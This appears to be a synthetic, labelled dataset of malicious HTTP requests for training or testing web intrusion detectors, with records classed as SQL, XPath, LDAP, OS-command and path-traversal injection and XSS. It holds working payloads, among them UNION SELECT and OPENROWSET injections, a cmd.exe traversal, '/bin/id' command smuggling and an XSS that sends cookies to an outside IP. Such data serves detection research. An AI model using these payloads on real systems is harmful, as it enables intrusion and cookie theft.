User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 8.9; ty-eo; rv:0.4.0) Gecko/96330763
UA-OS: Mac OS X
UA-Color: color32
Via: 1.5 24.145.44.19, FTP/3.6 www.rsrvnt.css, 4.5 219.11.63.145
Upgrade: eremce/4.3, xnzi/0.6, 6tgf/7.0, eal3Sa/3.7, tio/8.3
----: -------------------------

dstu2taomcr6fe=4&6ot0eacogta=mejlp1 s&tAheq5mnogf0ei4=eeeDdaeklink]m9hj&s2dfe9s=pgHSraNeset&ris1odetrCgsnjg=so&@sjbnc=itnucenxiatwlfqgA&cndeacesioaR=86352&5ylYservicesVNFmU=TNki&pze=9666139355&ewt9i=0766495508&hesFeh=78787

End - Id: 48215
Start - Id: 41381
class: SqlInjection
PUT /h1oooErni9ueororilt/t45t4nTm/eDcaLbqXgj/x9eG_gDI9u.B/bn/rFtsJba1o_/cribcfzos/33.swf? HTTP/1.1
Content-Length: 186
Content-Language: z,qcns
Content-Encoding: gzip
Content-Location: http://www.mous15Ur.gov/ohNEx/acseybg/astcoiiz/ozde9/25twUd.sh
Content-MD5: T0g1c3I0b0VvN2VlYWF1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Wed, 15 Mar 06 15:57:50 GMT
Host: 111.212.252.44:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: waT4b='zl'
Client-ip: 93.72.204.142
Cookie: mniudesi=tue
Cookie2: $Version="30"
Date: Mon, 12 May 08 22:19:49 CET
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Thu, 11 Jun 09 07:57:07 UTC
If-Unmodified-Since: Sat, 21 Jan 06 21:58:07 GMT
If-Match: "I7Wz--cPV01sT3@B"
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: -49879
Referer: http://www.lhn0y.fr/Ceos0rer/eraegrm/noeoa2/tlDasotn/rornf.nsf
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/5.6 (Windows; U; Win98 5.7; rt-gn; rv:0.7.4) Gecko/39562810
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

QO1Ntncbetween='UNIONALLSELECTfieldFROMtandWHERE''='&varchiieHyoset=403361&ens4ezgap=90&DbuOIFwp-Scmd=d&nE=13291347&fFgT8y=t.t3g7UOYd9&r9njzb=5963182363&imoduwahct=xqoat0mdtttr

End - Id: 41381
Start - Id: 42553
class: SqlInjection
GET /hF.Go/Cdtps3rncmiton/ET_Wg48Osq09k9/mdS@VQB2systemC/rccarloine4md4rarn.nsf?tax0iixnsn=6058&5Ofcstic=%3B+++select++++*+from+OPENROWSET%28%27SQLoledb%27%2C%27uid%3DeoEs9t%3Bpwd%3Dtcwaac%3BNetwork%3DDBMSSOCN%3BAddress%3D253.0.94.205%2C84476%3B%27%2C%27select+*+++from+++++ufwySd%27++++%29&wakeeszU=txuZBZZ.&fstnsi6azsrS=h HTTP/1.0
Host: www.es5uzens.it:585
Connection: 3tel
Accept: video/*, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.9, identity;q=0.3, deflate;q=0.2, identity
Accept-Language: l-eimn
Cache-Control: max-age=5659
Client-ip: 58.127.136.100
Cookie: otoeojir=759553716;Ecraetiu4eabe05=ln;Tddo=4n;ecngarm=edzt6
Cookie2: $Version="597"
Date: Thu, 31 Jul 08 14:53:02 CET
ETag: W/"LEVaDfsyAKfrIXNnW"
Expect: 100-continue
From: ygate@zW0nfe.com
If-Modified-Since: Thu, 10 Sep 09 18:20:57 CET
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: "gIpsjGeRUFY.ZzAqf"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 3
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -23041,40-95155,61918-
Referer: http://www.cernsle.net/ncse2s/awrtpeh.html
TE: gzip
Trailer: Upgrade
User-Agent: osoe/6.2
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: FTP/3.6 www.ecEnrj.js
Transfer-Encoding: compress
Upgrade: i5oae/7.4
Warning: 630 www.a0shtex.tiff "wilAeNfut" "Fri, 18 Nov 05 04:48:10 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42553
Start - Id: 49912
class: XPathInjection
GET /1iSDpLsqPu51j.sh?reinegei=spJ0icaEmdoa&ocos=shi%3E6&rtUswp-xWhttp=etne%7Ehtanhttps%3Esn7ri&heaeldcNr7aO0=tfn3o+winnte92netcatfp&ktemnjovn=mjroL2-GqSd%40&WsesczItg=%28i+%3C+count%28sdr%2Fchild%3A%3Atext%28%29%29+++++and+++j++%3C++++count%28Cvr%2Fchild%3A%3Acomment%28%29%29++++and+++k++%3C++++count%28afo%2Fchild%3A%3A*%29+++++%29&Dei=Tesxx%24 HTTP/1.0
Host: 161.49.220.24
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: compress, identity;q=0.3, identity
Accept-Language: dNeeksi-ogs;q=0.8, o6et-nlnne;q=0.0, tNbR6y-4dt5vgrd;q=0.0, c-eoerhe;q=0.1, aa5n0ho-ie6o
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="34"
Date: Wed, 23 Feb 05 22:50:03 CET
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
If-Modified-Since: Thu, 30 Jun 05 02:24:07 UTC
If-Unmodified-Since: Fri, 15 Jul 05 04:22:57 UTC
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: Digest algorithm=MD5-sess
Range: 3-
Referer: http://www.eh8ncreo.org/cwdotf/rs2lma/Bale.shtml
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.3 (compatible; Konqueror/4.9; WinNT; ajKd; 9mwIre; nneA)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 4.2 www.hcgi.png, 0.3 113.129.178.56
Transfer-Encoding: deflate
Upgrade: iEnTvf/9.1
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49912
Start - Id: 44555
class: OsCommanding
GET /ekkoW1w/2a7qOoW/AntfnsIeeaamAea8aixt/mhp@6Qvv@FXcNGw9l/roeaaleadToi/egrxnSin/o_LxUn5OjYUYeZTb_n/uJy4K8GgyDjP@Ikb/hiblmaeuwljhe.msf? HTTP/1.1
Host: 216.5.77.83
Connection: ETnus
Accept: */*;q=0.2
Accept-Charset: x-mac-japanese;q=0.2, big5, euc-cn;q=0.0, us-ascii, iso-8859-8-i
Accept-Encoding: 177.189.71.4    |    echo "test" >evilfile.txt
Accept-Language: nundkp-u;q=0.8, anoEan-otdal;q=0.1
Cache-Control: no-store
Date: Tue, 03 Aug 04 04:34:32 UTC
If-Match: "yQ_SZzTpMPE3HF.YglL"
If-Range: Fri, 03 Aug 07 03:49:30 GMT
Authorization: bhaaR lmtwr3jN=2pmQ
Referer: /fvq7do.gif
TE: gzip;q=0.9
User-Agent: aRXRWpzlS http://www.dhtt.it
Transfer-Encoding: compress

null

End - Id: 44555
Start - Id: 48789
class: XPathInjection
GET /ekRFCTMCBzPah.gif?u4bpnaestaneea=r6u&9HikfVnsH=7++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++492%3D&m1oWpitiosar=azeEaKq HTTP/1.0
Host: www.euoatare9I.be
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.6, text/xml;q=0.3
Accept-Charset: windows-1251, cp-932;q=0.0, iso-8859-4;q=0.8
Accept-Encoding: identity, deflate;q=0.8
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 208.70.172.168
Cookie: HCxX60G0V.=wylahdoa=1window.openafe;cidA1
Cookie2: $Version="7"
Date: Fri, 15 Aug 08 12:38:04 GMT
ETag: W/"ss3oYqwA5LRwWDU"
Expect: elan
From: iinongn@mnxs.it
If-Modified-Since: Sun, 23 Jul 06 07:48:35 UTC
If-Unmodified-Since: Fri, 05 Oct 07 09:08:38 UTC
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 7.6
Pragma: TaZsii='meuaA'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: /emepzf/oaHCbPt.cfm
TE: chunked
Trailer: If-Match
User-Agent: cvoptglnt (oH3XmBOeFx; a@1VJrhrcy; iTlU_5wA; 15v7_d; jz8rXU)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: 9.2 www.ngntiony.tiff, 1.0 www.altn.tiff, 4.9 www.laia7.gif
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 538 www.cErriaih.tiff:9 "osyScc8wde9ls" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48789
Start - Id: 47473
class: XSS
GET /ekedhollntoeSLgej/GwgetdVuVajN6mailTfw/aeY60R7A9l/aAKEUy.rU9Gp.@hw@W@/ifxhjOb/oslt/c6.gif?Oraei0l1f=4843566&erR=I&0tnbn=43&I_V5=hOHM8UU%40x&hfoy=06988&gauu1o=46&gli=yBF&la5Shooats=868&pn1p=cservicesyor9soon9Enoar++&ode=dobject&xXQ_delete=%3Cxml+++id++++%3D+++%22++++X%22+++%3E%3Ca+++%3E%3Cb++++%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F220.214.102.135%2Festoie.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++++%3E%3C%2Fa+++%3E%3C%2Fxml++++%3E HTTP/1.0
Host: www.eitrseeShe.ch:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1252;q=0.5, koi8;q=0.0, x-mac-ce;q=0.5, windows-1255, utf-7
Accept-Encoding: *
Accept-Language: ispr-hes
Cache-Control: rs=nha
Client-ip: 42.218.232.78
Cookie: .-wayEeJJN=ue;Pdjithc=inethprtbodyatK ot6eo;zlasjxtrsi=r;vttlw=lpassthruo;3Waccept6PWD0UzL= cei ti;nd3ebhkddDsa=ea=services<t(
Cookie2: $Version="8"
Date: Sun, 16 Jul 06 09:35:10 UTC
ETag: W/"s9.PqrmO-e_jWz@06.s"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Thu, 23 Dec 04 24:43:25 UTC
If-Unmodified-Since: Fri, 06 Nov 09 01:41:20 UTC
If-Match: *
If-None-Match: *
If-Range: "VprYULafqAsgReKNg"
Max-Forwards: 876
MIME-Version: 5.1
Pragma: nanI=uz4e
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: http://ntcibglo.it/henrht8k/menecAan/eah5/dtowt/ronl.txt
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 4.5; er-ai; rv:3.5.6) Gecko/61384950
UA-CPU: Sparc
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x653
Via: FTP/8.2 112.13.42.250
Transfer-Encoding: identity
Upgrade: rshhh0/1.3
Warning: 687 202.196.135.202:06 "idsvpmhabtisfehmuaet" "Sat, 02 Feb 08 06:06:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47473
Start - Id: 42291
class: SqlInjection
GET /Rz.y/rJLfOFK8DMbYe1c/ffZYRPQ18W.Rn3gTot.I/crssEaRhgw/quIkIboot.inizinZybdF/execpRKopenhnullr2Gdk/VolLbYeiotsufh/rsinlnngyeeJmdoe83/QDS1iMYP/newihninl/t5nr5oiSlc.shtml?SSbi=%27+++++union+select++++%40%40version%2C1%2C1%2C1-- HTTP/1.1
Host: www.leesXa5u.st
Connection: rccmhsh
Accept: audio/basic, audio/*, image/gif
Accept-Charset: euc-tw;q=0.5
Accept-Encoding: *
Accept-Language: ttegoc-3t;q=0.1, leete-bned, qiskhy-6acntd3;q=0.9, o1hm-s, nsfcty-vep;q=0.1
Cache-Control: min-fresh=956
Client-ip: 87.181.200.43
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Wed, 07 Jun 06 10:35:37 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Wed, 23 Dec 09 16:13:25 UTC
If-Unmodified-Since: Sun, 23 Nov 08 07:12:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.3
Pragma: pSuwoac=llhs2erX
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: tusE HcFen=tbiuae
Range: -568889,-588214
Referer: /5fuN/5ononae/posnhi.wmn
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 6.8; le-ia; rv:9.4.2) Gecko/45260975
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 443x7648
Via: 0.8 www.sSrhhhy.html:328
Transfer-Encoding: compress
Upgrade: lr2rr/2.7, aetd/1.2, tei/7.3, tgOeft/0.3, Ozehbn/5.9
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 0737501888973
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42291
Start - Id: 46410
class: PathTransversal
GET /dKh1vkoqEvK9Xj/eP@TEsnq@urp1n/jZpTW-pF_SAJR_A/90O2j7-Esm0Dzb@eIc3/zx/aYZPJA/t6@lytNa/0aslk.gif?havingAyFBqqhX6=%2F%2C%2C%2C%2Feetiyao%2Fnaar%2Fpasswd&Alacceptmail=9574 HTTP/1.1
Host: www.eerd.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: Ia9enr=taiT5k
Client-ip: 43.17.188.82
Cookie: rrTOA=nnulli vo;BIPGHNgvbscriptSex=i ymhqjhnnph-ace;C0H1Bld4J9=\h ;q32ei=4355645389
Cookie2: $Version="2"
Date: Thu, 22 Dec 05 09:31:17 UTC
ETag: "nzNGDS.22k6TV@-"
Expect: 100-continue
From: wegeqhea@e2xmcrate.uk
If-Modified-Since: Tue, 13 Sep 05 18:01:09 UTC
If-Unmodified-Since: Thu, 08 Apr 04 06:11:31 GMT
If-Match: "EdcmzS@jpq8B9yIs"
If-None-Match: "FcZucxYF2ZH7-TCbnU"
If-Range: *
Max-Forwards: 549
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=91bcfFB4
Range: 1622-,-5,-1
Referer: http://www.rjy9me.it/epe0Dn/gtalaTc/tdpr4i/tEbyophO/tb7el.swf
TE: deflate,trailers
Trailer: TE
User-Agent: mNO__kY9M http://www.stwnblb.it
UA-CPU: x86
UA-Disp: 459,725,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 525x634
Via: 9.1 46.37.27.31
Transfer-Encoding: compress
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46410
Start - Id: 38151
class: LdapInjection
GET /n5/eistshlloa3ituls/8KlTpyj9/JBvSie/wzwIBXRw.W2/bidaRDgt9newA3.htm?er=ttNdRZ98UR&HYo7inputCs=rir2%29%28%26%28objectClass+++%3D++Orn*%29&aabube5aJ6olr9E=5&armlteo=63085588 HTTP/1.0
Host: www.paHt.de
Connection: rPre
Accept: */*
Accept-Charset: x-mac-roman, euc-kr;q=0.9, utf-8
Accept-Encoding: *;q=0.2
Accept-Language: echocYdm-T
Cache-Control: hdinrneh=zer
Client-ip: 106.203.232.28
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="9"
Date: Sat, 17 Nov 07 23:57:13 GMT
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Wed, 03 Mar 10 07:45:58 GMT
If-Unmodified-Since: Fri, 27 Feb 09 07:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: "9PlG9Wu1j1RbdupzU"
Max-Forwards: 990
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: njtdo oiaHAsOe=InaIstei
Range: 652463-080254,-92,5914-088
Referer: /sjCe6sl/nuey.asmx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: gontefsooe/0.0
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: eys/5.7 www.Ee2qe.js, FTP/2.1 www.nw2e.css, 9.3 www.eonr1lzr.tiff
Transfer-Encoding: gzip
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 700 216.4.11.243 "oisttasyiausek4esAB8" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38151
Start - Id: 49787
class: XPathInjection
GET /zB-n/KEOpGj5locationdnetcate/8Sag3h/at66adIYew/LEa9Nf0/l5awegdwn4l/tnhlNt7Ana4ik/Itotaqaioth4pouao.html?tnealc4iadeam=wbolc%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27Ee%27%3D%27 HTTP/1.1
Host: www.ilemeltie6.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.1, identity, compress, compress
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 182.73.2.49
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="615"
Date: Wed, 16 Nov 05 20:06:03 CET
ETag: "JQl-q5Ler@UUd1wq"
Expect: 100-continue
From: terol@hDey.ch
If-Modified-Since: Wed, 13 Jun 07 22:12:45 GMT
If-Unmodified-Since: Mon, 25 Dec 06 14:29:24 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Oct 07 21:18:55 UTC
Max-Forwards: 2
MIME-Version: 5.9
Pragma: em='wum'
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: 800674-0,376-429,12-
Referer: http://www.sewxtih.com/dlAfnte/s1iiti.jsp
TE: trailers,gzip;q=0.9,chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 8.6; lp-ev; rv:9.3.4) Gecko/94255733
UA-CPU: Sparc
UA-Disp: 662,518,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: FTP/6.5 www.nimesa.html:2621, 0.5 197.30.128.133, FTP/2.1 www.rynva.shtml
Transfer-Encoding: lsmlfc; 1fe5=tteivt
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49787
Start - Id: 46888
class: XSS
POST /femug/ubrnvR9RxzG8/nrydoshwasi7r/vns0eer.gif? HTTP/1.1
Content-Length: 206
Content-Language: Dy,pimoee
Content-Encoding: compress
Content-Location: /e4ot/chp73y.conf
Content-MD5: YUF2aXp6cG9oYXdobWxwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Sun, 29 Aug 04 24:19:36 CET
Host: 234.255.3.84
Connection: avle
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 164.249.24.153
Cookie: jossbrmAiOit=dh4b@JCm;eisernzav=py60clhb
Cookie2: $Version="49"
Date: Tue, 13 Jan 04 12:39:35 CET
ETag: "NzR-ApOJwLt0kq3"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 05 Feb 04 19:46:31 GMT
If-Unmodified-Since: Sun, 08 Jan 06 14:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Mar 08 03:38:09 UTC
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /oee0r/eunlevol/e0fh/eiPisfdw.jsp
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: eureiaygh/8.1.0.7.5
UA-CPU: Sparc
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 0.2 www.ehmg5rs.css
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

.hbA=<meta  http-equiv =" refresh"     content   =   "     0;url=javascript:   [alert('ezpu');] "    >&uh=2&sqmtash4h=y &htahainniseho=0aVxbb&inxBjliIiframe4iiQ=r0ors:i

End - Id: 46888
Start - Id: 44213
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 246.135.57.250
Connection: 3aiei
Accept: text/*;q=0.7, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 2sh-ilE2aa;q=0.1, io-naturrR;q=0.0, 8riqd-ddhca;q=0.9, eaa-jr, wp-gza
Cache-Control: no-transform
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Wed, 04 Feb 09 12:21:10 UTC
ETag: "fCVpdS-De4XAIYRavLw"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Sat, 22 Mar 08 02:52:10 UTC
If-Match: *
If-None-Match: "02BWo86KrYbzqCLhlLoc"
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 2
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest realm
Range: 09660-850419
Referer: http://oocrt6.it/htouert.doc
TE: trailers,trailers
Trailer: User-Agent
User-Agent: t2necasneopk
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 534x7558
Via: 6.7 www.9wmetEm.htm:7872, 9.2 205.83.79.42
Transfer-Encoding: identity
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 834 www.ecbnesr.png "oqoba9" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44213
Start - Id: 43233
class: OsCommanding
GET /eSc/hJ9n6TM_X/dDSN2_09tKePpn/_1hwcEBtr00ahttps8g/sl5hoUywtgo6/iuiealmeFSyne8oeIe/szeymilfnconiledt/uc.swf?enOLTtS4peerts5=9111&1qNueer3o=l9eqBhesoesirzro&ihsanxt=52&6ht7insf1o=1fdinputtr%5D&sYlhs=%5C%3B++++%5C%2Fbin%5C%2Fid++%3B&xp_rE6LF3=e4L&7i=zn&Kposition6@iqR=es%7C%3Bd HTTP/1.1
Host: 235.244.127.31
Connection: tog1d
Accept: audio/x-wav, audio/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.8
Accept-Language: pei-petmd;q=0.8, t8ht-sem;q=0.0, eiepshcn-awa, Osmlwdt-Rwnonvoo;q=0.7
Cache-Control: min-fresh=22690
Client-ip: 36.211.14.62
Cookie: krolnRaamatht=6;wLyst=9732350;nplie3t2eel=roeho
Cookie2: $Version="306"
Date: Mon, 25 Jun 07 03:57:41 UTC
ETag: "si0ElM3X@WcQMbzOA"
Expect: 4es4yh
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 25 Jan 08 13:13:46 GMT
If-Match: "l2RZuA.oPX58npeoEF."
If-None-Match: *
If-Range: Sun, 29 Oct 06 01:39:39 CET
Max-Forwards: 6
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -80151
Referer: /eq5i44.jsp
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: aachoarsre/6.2.4.7
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 383x105
Via: 0.1 225.142.131.138
Transfer-Encoding: enoem
Upgrade: tshr/5.3, 5tst/7.5, env/0.8
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43233
Start - Id: 50115
class: XPathInjection
POST /uAHKBNrwACdjE9Ed/eYsiNihnneetrb/ZXG@A/eCIcKa4HPeasPh1KqZgK/est0tIneR6hns99/RO.shtml? HTTP/1.0
Content-Length: 303
Content-Language: saVqvf,i5attd8,icSta
Content-Encoding: identity
Content-Location: http://www.prtn.uk/eUto/85sn.ace
Content-MD5: YVh4dGU5cWJ0eGkyZ25lbA==
Content-Type: application/x-www-form-urlencoded
Host: www.SxsidluS.org
Connection: close
Accept: audio/x-wav;q=0.7
Accept-Charset: iso-8859-15, iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=6
Client-ip: 6.230.241.102
Cookie: eLsmaeM=(i   <  count(ae/child::text())     and    j <    count(balno/child::comment())     and   k     <     count(k6q/child::*) );eRin4cltbw=rdo;O4tvnoreanj9cl=c;0s60e7=02;stjt=copyte
ETag: W/"AW4m3HM.UY@1uRWaJ@"
Max-Forwards: 6
Pragma: no-cache
Referer: http://www.rtnh3ue.cz/etl5e/fidc/peac.asmx
TE: trailers,trailers,trailers
User-Agent: edMFGm_a http://www.fhelo.uk
Transfer-Encoding: compress

